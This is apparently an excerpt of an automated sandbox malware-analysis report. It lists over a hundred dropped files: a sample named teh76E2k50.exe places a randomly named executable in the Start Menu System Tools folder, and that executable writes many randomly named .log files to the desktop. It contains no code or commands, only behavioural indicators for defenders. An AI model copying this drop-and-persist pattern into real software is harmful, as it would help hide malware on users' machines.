                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FJIjaFCP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kBXYGWDW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\xjEfhhcu.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\CJDckQCP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JnnBaKLz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ekfHlLLW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\QtRSZTAM.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\oeuNoEPw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mOmHPFNu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\bVwqfKcL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZtCSvoKO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CwClOmSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XkxktgYB.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\BMbUPQnU.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fNFadZoi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mdpOgNja.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\MwSuJUdT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\trTNZned.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nxgeHjhA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\MKncHkNR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VBwJNHMX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SugjFhrA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\tlovySpD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZnXAVSVo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LGJlUtwq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\rkdyzPpO.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\SmnyDbFc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LOtDzcWv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TnccMNji.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mQxGLdSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UkEZnNMm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qDXyTobI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nNYOgdhm.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YsCiJgGh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KszcatAz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OnPkEyEo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fQyImqSF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ASPeVAWX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\dKlIuyLO.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\WKjpqzTc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IgGVBfqZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LEvStJys.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nYXzmwFp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VOpRirdG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NEWCTUxq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VDLborKV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CYcTTrrX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UmOidmEa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YwaKaovT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fUOHmcKi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sgXWGXfk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eWPiaGig.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jFHPguuZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\oZZOlFlp.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\DAfcAdjS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WLQZDrsB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WgxIpVoy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\lzFWljSG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vpCPqhyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KMbLIKLR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hMsguyJb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IQXUcfJd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qHVggSrJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WiesDNNX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\MmOLMqmx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\otZOJrJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\baJGltgV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IzyaiCCJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\EzoTkVXm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JapvNPbx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\dQWYMfTH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZaghFjTO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eTYoXqRT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eeFyxBcE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HPmLzFXY.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\DswJWuJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AefMODTq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FxxLTNKF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hssgXLlC.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\xxZNeyLt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eHNQPyaJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pwZqNBtQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jGqnAmhH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zaBVcLCP.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\GrWSIakL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yHtdVhrW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\xATktOEY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NQgmULbr.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\SlzRxYMl.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HgsdOaRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zmLFdDgP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pvrGzKVr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BpxnzmkL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vrvmFyrk.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\kGyWBgAx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SWHRKmQg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FFhdxwlL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kDcZKjpC.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\MjzskGoA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YjjrLEtu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DXOleQyG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\GGiDqFDB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\EVCmjrsI.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\MbPZGXOu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\HJAvhXOf.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\AQotzTRR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JvdSwEFX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YuMryEyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AVHMeQAt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NImBSGpT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\naQWCNyV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\iKNqYmED.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DDuvcNgQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\luCemuwv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\rGeXPKfd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\GOTKaosQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JQrKHwDu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VZbjtNtA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\aZMqfwUo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZpcBYfHT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sKHPBBwF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fPQYZyug.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sFKgoXgD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FUptAQNB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\toafQXzH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LNSSdwSp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yERXsZaS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FFnbpIFd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ccSQbSYJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VlDkhNyc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zYgEJQlz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hAixtGfa.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\LESjjfMz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OLsbOcto.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CYbeNrdN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WlXaMeru.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jLOQRvWt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CUHLiuul.logJump to dropped file
